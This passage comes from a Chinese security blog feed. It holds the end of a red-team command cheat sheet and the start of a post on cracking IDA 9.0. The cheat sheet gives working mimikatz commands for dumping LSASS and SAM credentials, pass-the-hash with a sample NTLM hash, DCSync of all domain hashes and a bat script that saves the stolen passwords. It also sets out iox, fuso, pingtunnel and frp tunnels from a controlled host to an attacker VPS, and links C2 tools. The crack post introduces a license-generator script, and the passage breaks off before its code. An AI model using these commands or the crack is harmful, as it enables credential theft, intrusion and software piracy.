title="获取登录凭证信息"></a>获取登录凭证信息</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe log &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords&quot; exit</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">sekurlsa::logonpasswords</span><br></pre></td></tr></table></figure><h3 id="lsass-exe-导出凭据"><a href="#lsass-exe-导出凭据" class="headerlink" title="lsass.exe 导出凭据"></a>lsass.exe 导出凭据</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe log &quot;sekurlsa::minidump lsass.dmp&quot; &quot;sekurlsa::logonPasswords full&quot; exit</span><br></pre></td></tr></table></figure><h3 id="mimikatz-PTH-传递-cmd"><a href="#mimikatz-PTH-传递-cmd" class="headerlink" title="mimikatz PTH 传递 cmd"></a>mimikatz PTH 传递 cmd</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz &quot;privilege::debug&quot; &quot;sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:cmd.exe&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure><h3 id="mimikatz-PTH-传递-mstsc"><a href="#mimikatz-PTH-传递-mstsc" class="headerlink" title="mimikatz PTH 传递 mstsc"></a>mimikatz PTH 传递 mstsc</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz &quot;privilege::debug&quot;  &quot;sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 /run:mstsc.exe /restrictedadmin&quot; &quot;exit&quot;</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">privilege::debug</span><br><span class="line">sekurlsa::pth /user:Administrator /domain:WIN-9UUCAGH32BT /ntlm:f33dfac0370b09935d0037d8333caf25 &quot;/run:mstsc.exe /restrictedadmin&quot;</span><br></pre></td></tr></table></figure><h3 id="SAM-数据库导出凭据"><a href="#SAM-数据库导出凭据" class="headerlink" title="SAM 数据库导出凭据"></a>SAM 数据库导出凭据</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz &quot;log&quot; &quot;lsadump::sam /sam:sam.hive /system:system.hive&quot;  &quot;exit&quot;</span><br></pre></td></tr></table></figure><h3 id="bat-脚本获取凭据"><a href="#bat-脚本获取凭据" class="headerlink" title="bat 脚本获取凭据"></a>bat 脚本获取凭据</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">cd /d D:\tools\</span><br><span class="line">mimikatz.exe privilege::debug sekurlsa::logonpasswords exit &gt; C:\windows\temp\log.txt</span><br></pre></td></tr></table></figure><h3 id="导出域内所有用户hash"><a href="#导出域内所有用户hash" class="headerlink" title="导出域内所有用户hash"></a>导出域内所有用户hash</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe &quot;lsadump::dcsync /domain:test.com /all /csv&quot; exit</span><br></pre></td></tr></table></figure><h2 id="proxy-tools"><a href="#proxy-tools" class="headerlink" title="proxy tools"></a>proxy tools</h2><h3 id="iox"><a href="#iox" class="headerlink" title="iox"></a>iox</h3><p>下载地址：<a href="https://github.com/EddieIvan01/iox">https://github.com/EddieIvan01/iox</a></p><h4 id="proxy"><a href="#proxy" class="headerlink" title="proxy"></a>proxy</h4><blockquote><p>在本地 0.0.0.0:1080启动Socks5服务</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./iox proxy -l 1080</span><br></pre></td></tr></table></figure><blockquote><p>加密转发 socks5 代理：</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">VPS 监听(//将1080端口监听到的流量转发至50054端口):</span><br><span class="line">nohup ./iox proxy -l 50054 -l 1081 -k 3211 &gt; iox.log &amp;  </span><br><span class="line"></span><br><span class="line">在目标主机执行(//启动代理服务并发送至VPS 50054端口)：</span><br><span class="line">./iox proxy -r VPSIP:50054 -k 3211  </span><br><span class="line"></span><br><span class="line">然后本地socks5代理：socks5://vps:1081</span><br></pre></td></tr></table></figure><h4 id="fwd"><a href="#fwd" class="headerlink" title="fwd"></a>fwd</h4><blockquote><p>本地端口转发 3389 至VPS:</p></blockquote><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">vps执行:</span><br><span class="line">nohup ./iox fwd -l *8888 -l 33890 -k 22222</span><br><span class="line"></span><br><span class="line">目标机器执行:</span><br><span class="line">iox.exe fwd -r 192.168.0.1:3389 -r *VPSIP:8888 -k 22222</span><br><span class="line"></span><br><span class="line">随后连接 VPS:33890 即可访问内网 3389</span><br></pre></td></tr></table></figure><h3 id="fuso"><a href="#fuso" class="headerlink" title="fuso"></a>fuso</h3><p>Github：<a href="https://github.com/editso/fuso">https://github.com/editso/fuso</a></p><h4 id="socks"><a href="#socks" class="headerlink" title="socks"></a>socks</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">VPS：</span><br><span class="line">./fus</span><br><span class="line"></span><br><span class="line">//被控机</span><br><span class="line">./fuc.exe VPSIP 6722 --socks</span><br></pre></td></tr></table></figure><ul><li>linux：i686-unknown-linux-musl.zip</li><li>windows：x86_64-pc-windows-msvc.zip</li></ul><h4 id="readme"><a href="#readme" class="headerlink" title="readme"></a>readme</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line">1. 端口转发</span><br><span class="line">fuc --forward-host xxx.xxx.xxx.xxx --forward-port</span><br><span class="line">   --forward-host: 转发到的地址</span><br><span class="line">   --forward-port: 转发到的端口</span><br><span class="line">   如: 转发流量到内网 10.10.10.4:3389</span><br><span class="line">   &gt; fuc --forward-host 10.10.10.4 --forward-port 3389</span><br><span class="line"></span><br><span class="line">2. socks5:</span><br><span class="line">fuc --socks --su --s5p xxx --s5u xxx</span><br><span class="line">   --su: 可选的, 开启udp转发, </span><br><span class="line">   --s5p: 可选的, 认证密码, 默认不进行密码认证</span><br><span class="line">   --s5u 可选的, 认证账号, 默认账号 anonymous</span><br><span class="line">   --socks: 可选的, 开启socks5代理, 未指定--su的情况下不会转发udp</span><br><span class="line">   如: 开启udp转发与密码认证</span><br><span class="line">   &gt; fuc --socks --su --s5p 123 --s5u socks</span><br><span class="line">   此时, 已开启udp转发,连接密码为 &quot;123&quot;,账号为 &quot;socks&quot;</span><br><span class="line"></span><br><span class="line">3. 指定穿透成功时访问的端口</span><br><span class="line">   fuc -b xxxx</span><br><span class="line">   -b | --visit-bind-port: 可选的, 默认随机分配</span><br><span class="line">   如: 访问外网端口 8888 转发到内网 80</span><br><span class="line">   &gt; fuc --forward-port 80 -b 8888</span><br><span class="line"></span><br><span class="line">4. 桥接模式 注意: 目前不能转发udp</span><br><span class="line">   fuc --bridge-listen xxxx --bridge-port xxx </span><br><span class="line">   --bridge-listen | --bl: 监听地址, 默认 127.0.0.1</span><br><span class="line">   --bridge-port | --bp: 监听端口, 默认不启用桥接</span><br><span class="line">   如: 开始桥接模式,并监听在9999端口, 本机ip地址为: 10.10.10.2</span><br><span class="line">   &gt; fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 开启桥接</span><br><span class="line">   &gt; fuc 10.10.10.2 9999 # 建立连接</span><br><span class="line"></span><br><span class="line">   级联: </span><br><span class="line">   &gt; fuc --bridge-listen 0.0.0.0 --bridge-port 9999 # 第一级, IP: 10.10.10.2</span><br><span class="line">    &gt; fuc --bridge-listen 0.0.0.0 --bridge-port 9991  10.10.10.2 9999 # 第二级, IP: 10.10.10.3</span><br><span class="line">     &gt; fuc 10.10.10.3 9991 # 最终 </span><br><span class="line"></span><br><span class="line">5. 将连接信息通知到 Telegram 或其他</span><br><span class="line">   fus --observer &quot;program:[arguments]&quot;</span><br><span class="line">   --observer: 建立连接或断开连接时的钩子</span><br><span class="line">   如: 使用bash脚本将连接信息通知到tg</span><br><span class="line">   &gt; fus --observer &quot;/bin/bash:[telegram.sh]&quot;</span><br><span class="line"></span><br><span class="line">6. 指定客户端与服务端通信的端口</span><br><span class="line">   fuc --channel-port 8888 ...</span><br><span class="line">   --channel-port: 可选的, 客户端与服务端通信端口, 默认随机</span><br></pre></td></tr></table></figure><h3 id="pingtunnel-frp-搭-icmp-隧道"><a href="#pingtunnel-frp-搭-icmp-隧道" class="headerlink" title="pingtunnel+frp 搭 icmp 隧道"></a>pingtunnel+frp 搭 icmp 隧道</h3><p>pingtunnel 下载：<a href="https://oss.ywhack.com/%E4%BB%A3%E7%90%86%E9%9A%A7%E9%81%93/pingtunnel-2.6">https://oss.ywhack.com/%E4%BB%A3%E7%90%86%E9%9A%A7%E9%81%93/pingtunnel-2.6</a></p><h4 id="被控机"><a href="#被控机" class="headerlink" title="被控机"></a>被控机</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nohup ./pingtunnel -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:10000 -sock5 -1 -noprint 1 -nolog 1 &gt;p.log &amp;</span><br><span class="line">nohup ./frpc -c frpc.ini &gt; fff.log &amp;</span><br></pre></td></tr></table></figure><p>pingtunnel -l 监听本地的9999端口 -s vps主机IP -t vps主机frp服务端口</p><h4 id="客户端frp配置"><a href="#客户端frp配置" class="headerlink" title="客户端frp配置"></a>客户端frp配置</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">[common]</span><br><span class="line">server_addr = 127.0.0.1</span><br><span class="line">server_port = 10000</span><br><span class="line">token = PassW0Rd</span><br><span class="line"></span><br><span class="line">[zhaoshangju_10078]</span><br><span class="line">type = tcp</span><br><span class="line">remote_port = 10015</span><br><span class="line">plugin = socks5</span><br><span class="line">plugin_user = thIsuserAS</span><br><span class="line">plugin_passwd = Passweqwe0Rm</span><br><span class="line">use_encryption = true</span><br></pre></td></tr></table></figure><h4 id="VPS"><a href="#VPS" class="headerlink" title="VPS"></a>VPS</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">./pingtunnel -type server</span><br><span class="line">./frps -c frps.ini</span><br></pre></td></tr></table></figure><p>本地代理vps的 10015 端口加上密码即可使用icmp隧道。</p><p>参考文章：<a href="https://www.cnblogs.com/cute-puli/p/15213394.html">https://www.cnblogs.com/cute-puli/p/15213394.html</a></p><h3 id="FRP"><a href="#FRP" class="headerlink" title="FRP"></a>FRP</h3><ul><li>将 frps 及 frps.ini 放到具有公网 IP 的机器上。</li><li>将 frpc 及 frpc.ini 放到处于内网环境的机器上。</li><li>客户端：frpc -c frpc.ini</li><li>服务端：frps -c frps.ini</li></ul><p>Github:<a href="https://github.com/fatedier/frp">https://github.com/fatedier/frp</a></p><h3 id="代理工具列表"><a href="#代理工具列表" class="headerlink" title="代理工具列表"></a>代理工具列表</h3><ul><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly93d3cucHJveGlmaWVyLmNvbS8=">proxifier 全平台代理工具，支持多种socks协议</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2ZhdGVkaWVyL2ZycA==">frp 专注于内网穿透的高性能的反向代理应用</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2VoYW5nLWlvL25wcw==">nps 轻量级、高性能、功能强大的内网穿透代理服务器</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0VkZGllSXZhbjAxL2lveA==">iox 端口转发 &amp; 内网代理工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3BoNG50b25uL1N0b3dhd2F5">Stowaway 面向渗透测试人员的多级代理工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3JhcGl6MS9yYXRob2xl">rathole Rust 编写的安全、稳定、高性能的内网穿透工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2IyM3IwL3Jzb2N4">rsocx 一款高性能的支持绑定&#x2F;反向代理的 Socks5 工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL01vYjIwMDMvcmFrc2hhc2E=">rakshasa 基于go编写的跨平台、稳定、隐秘的多级代理内网穿透工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0ZlbGlzQ2F0dXMvU3dpdGNoeU9tZWdh">SwitchyOmega 浏览器的代理插件</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0wtY29kZXMvTmVvLXJlR2Vvcmc=">Neo-reGeorg 改进的reGeorg版本</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2FsZXgtc2VjdG9yL2RuczJ0Y3A=">dns2tcp是一款利用dns协议传输tcp数据的工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2lhZ294ODYvZG5zY2F0Mg==">dnscat2 是一个DNS隧道工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL25jY2dyb3VwL0FCUFRUUw==">ABPTTS 基于ssl加密的http隧道工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cDovL3Jvb3RraXRlci5jb20vVGVybWl0ZS8=">Termite 内网渗透代理、端口转发工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0ZRcmFiYml0L1NTVGFwLVJ1bGU=">SSTap, 一款利用虚拟网卡在网络层实现的代理工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2lkbGVmaXJlL2V3">ew 用于开启 SOCKS v5 代理服务的工具(跨平台)</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL250b3AvbjJu">n2n 开源的点对点穿透工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0NURi1NaXNzRmVuZy9FY2xvdWQ=">Ecloud 一款基于http&#x2F;1.1协议传输TCP流量的工具</a></li><li>[2021.03.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2lucXVpc2IvaWNtcHNo">icmpsh 一个简单的 reverse ICMP shell</a></li><li>[2021.03.08] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2luY29uc2hyZXZlYWJsZS9uZ3Jvaw==">ngrok 正&#x2F;反向代理，内网穿透，端口转发</a></li><li>[2021.03.08] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9zZWN1cmVzb2NrZXRmdW5uZWxpbmcuZ2l0aHViLmlvL3NzZi8=">ssf 全平台的加密隧道 端口转发工具</a></li><li>[2021.03.14] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2hhYWQvcHJveHljaGFpbnM=">proxychains 命令行代理神器</a></li><li>[2021.03.14] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2NyYWJrdW4vc3dpdGNoZXI=">switcher 一个多功能的端口转发&#x2F;端口复用工具</a></li><li>[2021.03.22] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2VzcnJocy9waW5ndHVubmVs">pingtunnel 是把 tcp&#x2F;udp&#x2F;sock5 流量伪装成 icmp 流量进行转发的工具</a></li><li>[2021.03.26] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2pwaWxsb3JhL2NoaXNlbA==">chisel – 一款快速稳定的隧道工具</a></li><li>[2021.03.29] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0Z1bm55V29sZi9weXN0aW5nZXI=">pystinger – 一款使用webshell进行流量转发的出网工具</a></li><li>[2021.03.29] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2JsYWNrYXJyb3dzZWMvcGl2b3RuYWNjaQ==">pivotnacci – 通过HTTP代理建立socks连接的工具</a></li><li>[2021.04.06] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2ZmYXkvbGFucHJveHk=">lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具</a></li><li>[2021.04.14] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0RsaXYzL1Zlbm9t">Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具</a></li><li>[2021.05.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3NuYWlsMDA3L2dvcHJveHk=">goproxy 一款轻量级、功能强大、高性能的多种代理工具</a></li><li>[2021.05.07] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3NoaW1tZXJpcy9TQ0ZQcm94eQ==">SCFProxy 一个基于腾讯云函数服务的免费代理池</a></li><li>[2021.06.21] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL21vc24vbW9zbg==">MOSN 是边缘或服务网格的云原生代理。</a></li><li>[2021.06.23] – <a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0RheWJyNGFrL0MyUmV2ZXJzZVByb3h5">C2ReverseProxy 一款可以在不出网的环境下进行反向代理及cs上线的工具</a></li></ul><h2 id="后渗透工具列表"><a href="#后渗透工具列表" class="headerlink" title="后渗透工具列表"></a>后渗透工具列表</h2><h3 id="f8x"><a href="#f8x" class="headerlink" title="f8x"></a>f8x</h3><blockquote><p>一款红&#x2F;蓝队环境自动化部署工具,支持多种场景,渗透,开发,代理环境,服务可选项等</p></blockquote><ul><li>项目地址：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2ZmZmZmZmZmMHgvZjh4">https://github.com/ffffffff0x/f8x</a></li><li>中文文档：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2ZmZmZmZmZmMHgvZjh4L2Jsb2IvbWFpbi9SRUFETUUuemgtY24ubWQ=">https://github.com/ffffffff0x/f8x/blob/main/README.zh-cn.md</a></li></ul><h3 id="Supershell"><a href="#Supershell" class="headerlink" title="Supershell"></a>Supershell</h3><blockquote><p>Supershell C2 远控平台，基于反向SSH隧道获取完全交互式Shell</p></blockquote><ul><li>项目地址：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL3RkcmFnb242L1N1cGVyc2hlbGw=">https://github.com/tdragon6/Supershell</a></li></ul><h3 id="Viper"><a href="#Viper" class="headerlink" title="Viper"></a>Viper</h3><blockquote><p>互联网攻击面管理&amp;红队模拟平台</p></blockquote><ul><li>项目地址：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0Z1bm55V29sZi9WaXBlcg==">https://github.com/FunnyWolf/Viper</a></li><li>安装 or 使用手册：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly93d3cueXVxdWUuY29tL3ZpcGVyc2VjL2luc3RhbGwvb2xnMXVh">https://www.yuque.com/vipersec/install/olg1ua</a></li></ul><h3 id="Sliver-C2"><a href="#Sliver-C2" class="headerlink" title="Sliver C2"></a>Sliver C2</h3><blockquote><p>Sliver C2 是一个开源的跨平台红队框架。</p></blockquote><ul><li>项目地址：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL0Jpc2hvcEZveC9zbGl2ZXI=">https://github.com/BishopFox/sliver</a></li><li><a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9mb3J1bS5idXRpYW4ubmV0L3NoYXJlLzIyNDM=">红队工具研究篇 – Sliver C2</a></li></ul><h3 id="Impacket"><a href="#Impacket" class="headerlink" title="Impacket"></a>Impacket</h3><blockquote><p>内网渗透 Python 工具包</p></blockquote><ul><li>项目地址：<a href="http://doc.vulexp.cn/?golink=aHR0cHM6Ly9naXRodWIuY29tL2ZvcnRyYS9pbXBhY2tldA==">https://github.com/fortra/impacket</a></li></ul>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;红队命令速查-洞查文库&quot;&gt;&lt;a href=&quot;#红队命令速查-洞查文库&quot; class=&quot;headerlink&quot; title=&quot;红队命令速查-洞查文库&quot;&gt;&lt;/a&gt;红队命令速查-洞查文库&lt;/h1&gt;&lt;div calss=&#39;anzhiyu-tag-link&#39;&gt;&lt;a clas</summary>
      
    
    
    
    <category term="资源分享" scheme="https://blog.2sec.io/categories/%E8%B5%84%E6%BA%90%E5%88%86%E4%BA%AB/"/>
    
    
    <category term="资源分享" scheme="https://blog.2sec.io/tags/%E8%B5%84%E6%BA%90%E5%88%86%E4%BA%AB/"/>
    
    <category term="网络安全" scheme="https://blog.2sec.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
    
  </entry>
  
  <entry>
    <title>IDA9.0 破解</title>
    <link href="https://blog.2sec.io/2024/08/18/%E8%B5%84%E6%BA%90%E5%88%86%E4%BA%AB/IDA9.0%20%E7%A0%B4%E8%A7%A3/"/>
    <id>https://blog.2sec.io/2024/08/18/%E8%B5%84%E6%BA%90%E5%88%86%E4%BA%AB/IDA9.0%20%E7%A0%B4%E8%A7%A3/</id>
    <published>2024-08-18T10:29:08.000Z</published>
    <updated>2024-11-25T12:26:55.437Z</updated>
    
    <content type="html"><![CDATA[<h1 id="IDA9-0-破解"><a href="#IDA9-0-破解" class="headerlink" title="IDA9.0 破解"></a><strong>IDA9.0 破解</strong></h1><div class="note orange icon-padding simple"><i class="note-icon fas fa-bell"></i><p> 来源：</p><p><a href="https://bbs.kanxue.com/thread-277984.htm">看雪论坛｜IDA 版本历代记</a></p><p>下载链接: <a href="https://od.cloudsploit.top/zh-CN/tools/DAI/">下载链接</a></p><p>Python代码版本的lic生成脚本</p></div><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span 